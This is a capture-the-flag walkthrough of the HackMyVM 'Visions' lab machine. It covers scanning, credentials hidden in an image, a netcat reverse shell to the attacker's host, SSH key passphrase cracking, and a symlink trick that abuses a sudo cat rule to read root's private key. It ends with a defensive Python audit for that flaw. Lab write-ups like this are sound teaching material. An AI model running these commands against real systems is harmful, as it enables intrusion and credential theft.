
HackMyVM target series (3): Visions

2022-07-06 13:57:00 The moon should know my meaning

1. Information gathering

First probe the network segment to locate the target host

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

Then run a port scan; it turns up an ssh service and an http service

nmap -sC -sV -p- 192.168.200.234

Visiting the http service, I found only one picture and a comment.

The comment looks like a hint, and alicia is probably a username

Use dirsearch to scan for directories and see what turns up

dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502

However, nothing is found

Following the hint, download the picture and inspect its metadata

curl http://192.168.200.234/white.png -o white.png

./exiftool white.png

As pictured, the password is found

Tool usage and download:

ExifTool complete introduction guide

alicia:ihaveadream

2. Exploitation

Login succeeds

After logging in I didn't find the flag in the current directory. Looking at the home directory I found 4 users, and then found the flag in sophia's directory, but I have no permission to read it.

So try privilege escalation first?

sudo -l

The current user can run nc as user emma without a password.

In that case, get a reverse shell first.

Listen on a port on kali

Then run the following command on the target machine

sudo -u emma nc 192.168.200.192 10000 -e /bin/bash

The shell comes back; use python to get an interactive shell

python -c 'import pty; pty.spawn("/bin/bash")'

There is a note.txt file in the current directory, with the following contents.

I don't get it??? I don't know what it means.

Then I checked suid and sudo privilege escalation again, with no breakthrough.

Later I read an expert's writeup and found that an image processing tool is needed

StegOnline

After uploading the picture, click the arrow.

Then the username and password become visible. This machine really does hide all its information in this one picture

sophia:seemstobeimpossible

Login successful

The current user can run the cat command as any user to view the .invisible file. That means we can use cat to read the file with root privileges.

Opening it, it is user isabella's private key; use it to log in

It still asks for a passphrase.

The only option left is to brute-force it

You can use john the ripper for cracking, but first convert id_rsa into a hash that john recognizes with the following command

python3 /usr/share/john/ssh2john.py id_rsa > crack.txt

I use a script to crack it here.

rockyou.txt is a wordlist that ships with kali, /usr/share/wordlists/rockyou.txt.gz; it must be decompressed before use, otherwise the content is garbled

gzip -d rockyou.txt.gz

The password is cracked successfully (it is more than ten thousand lines into the wordlist, but for this writeup I moved it to the front)

invisible

As pictured, login successful

From here on the IP is different, because I switched networks

3. Privilege escalation

Check whether any commands are available for privilege escalation

However, no breakthrough

Then I suddenly remembered that the sophia user reads the .invisible file as root with cat. Could the isabella user link .invisible to the root user's private key?

Create a soft link

ln -sf /root/.ssh/id_rsa .invisible

Read the root user's private key

sudo cat /home/isabella/.invisible

There is a small problem when logging in with the private key: permissions that are too open make the login fail.

Tighten the permissions and log in again

chmod 600 key

Login successful, root privileges obtained
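The root step above works because a sudo rule names a file that lives in the rule owner's own home directory, so the owner can swap it for a symlink and the privileged cat follows it. As an added example (not code from the original writeup), here is a small Python audit for that class of sudoers rule, plus the open pattern a privileged reader should use instead of blindly following links. The directory layout it builds under a temp dir is constructed for the demo; user and path names are stand-ins, and the placeholder key is not a real key.

```python
import os
import tempfile

def path_is_under(path, directory):
    """True if the fully resolved path lies inside the resolved directory."""
    real = os.path.realpath(path)
    base = os.path.realpath(directory).rstrip(os.sep)
    return real == base or real.startswith(base + os.sep)

def audit_sudo_file_rule(runas_user, target_path, owner_home):
    """
    Audit a sudoers rule of the shape
        <owner> ALL=(<runas_user>) NOPASSWD: /bin/cat <target_path>
    Returns a list of findings; an empty list means nothing was detected.
    """
    findings = []
    parent = os.path.dirname(target_path)
    if path_is_under(parent, owner_home):
        findings.append(
            f"{target_path} lives inside {owner_home}, which the rule owner controls: "
            f"the file can be removed and replaced by a symlink")
    if os.path.islink(target_path) and not path_is_under(target_path, owner_home):
        findings.append(
            f"{target_path} is a symlink to {os.path.realpath(target_path)} outside "
            f"{owner_home}; 'sudo -u {runas_user} cat' would read that file instead")
    return findings

def read_without_following_links(path):
    """
    How a privileged reader should open a file it was handed: O_NOFOLLOW makes
    the open fail (ELOOP on Linux) if the final component is a symlink, instead
    of silently reading whatever it points at. Returns the bytes on success.
    """
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as fh:
        return fh.read()

def demo():
    """
    Constructed layout: home/isabella/.invisible is a symlink to root/.ssh/id_rsa
    (a placeholder file, not a key). Returns (number of findings, read blocked?).
    """
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home", "isabella")
        secret_dir = os.path.join(tmp, "root", ".ssh")
        os.makedirs(home)
        os.makedirs(secret_dir)
        secret = os.path.join(secret_dir, "id_rsa")
        with open(secret, "w") as fh:
            fh.write("CONSTRUCTED-PLACEHOLDER-NOT-A-KEY\n")
        target = os.path.join(home, ".invisible")
        os.symlink(secret, target)

        findings = audit_sudo_file_rule("root", target, home)
        try:
            read_without_following_links(target)
            blocked = False
        except OSError:
            blocked = True
        return len(findings), blocked

if __name__ == "__main__":
    count, blocked = demo()
    print(f"findings: {count}, symlink read blocked: {blocked}")
```

The durable fix is not a smarter cat but a rule that only ever references a root-owned file in a root-owned directory; the audit function exists to point out rules that do not meet that bar.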


Copyright notice
This article was written by [The moon should know my meaning]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/187/202207060917556602.html